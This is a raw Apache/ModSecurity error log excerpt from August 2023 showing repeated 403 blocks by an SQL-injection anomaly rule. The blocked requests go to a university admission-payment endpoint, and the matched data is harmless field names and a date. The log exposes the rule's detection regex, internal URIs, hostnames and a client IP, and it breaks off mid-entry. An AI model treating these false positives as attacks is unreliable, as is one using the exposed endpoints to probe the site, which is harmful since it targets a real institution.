[Tue Aug 29 09:38:45.148122 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNcCo-f0AAPjinb4AAAAF"]
[Tue Aug 29 09:38:45.332240 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNcCo-f0AAPjinb8AAAAF"]
[Tue Aug 29 09:38:45.515663 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNcCo-f0AAPjincAAAAAF"]
[Tue Aug 29 09:38:45.700416 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNcCo-f0AAPjincEAAAAF"]
[Tue Aug 29 09:38:45.865860 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNcCo-f0AAPjincIAAAAF"]
[Tue Aug 29 09:38:46.052085 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNsCo-f0AAPjincMAAAAF"]
[Tue Aug 29 09:38:46.227975 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNsCo-f0AAPjincQAAAAF"]
[Tue Aug 29 09:38:46.403143 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNsCo-f0AAPjincUAAAAF"]
[Tue Aug 29 09:38:46.636284 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNsCo-f0AAPjincYAAAAF"]
[Tue Aug 29 09:38:59.863608 2023] [:error] [pid 63488] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1aQ8Co-f0AAPgAvuEAAAAH"]
[Tue Aug 29 09:38:59.863719 2023] [:error] [pid 63488] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1aQ8Co-f0AAPgAvuEAAAAH"]
[Tue Aug 29 09:39:01.759853 2023] [:error] [pid 63694] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:tglkuitansi. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS:tglkuitansi: 2023-08-29T00:00:00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/save"] [unique_id "ZO1aRcCo-f0AAPjO7gQAAAAp"]
[Tue Aug 29 09:40:22.188211 2023] [:error] [pid 63715] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:tglkuitansi. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS:tglkuitansi: 2023-08-29T00:00:00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/save"] [unique_id "ZO1alsCo-f0AAPjjG1cAAAAG"]
[Tue Aug 29 09:40:23.796826 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1al8Co-f0AAPjIfiIAAAAj"]
[Tue Aug 29 09:40:23.912215 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1al8Co-f0AAPjIfiMAAAAj"]
[Tue Aug 29 09:40:24.403367 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amMCo-f0AAPjIfiQAAAAj"]
[Tue Aug 29 09:40:25.271460 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amcCo-f0AAPjIfiUAAAAj"]
[Tue Aug 29 09:40:25.767934 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amcCo-f0AAPjIfiYAAAAj"]
[Tue Aug 29 09:40:26.078292 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amsCo-f0AAPjIficAAAAj"]
[Tue Aug 29 09:40:26.399436 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amsCo-f0AAPjIfigAAAAj"]
[Tue Aug 29 09:40:26.687569 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amsCo-f0AAPjIfikAAAAj"]
[Tue Aug 29 09:40:26.879159 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: 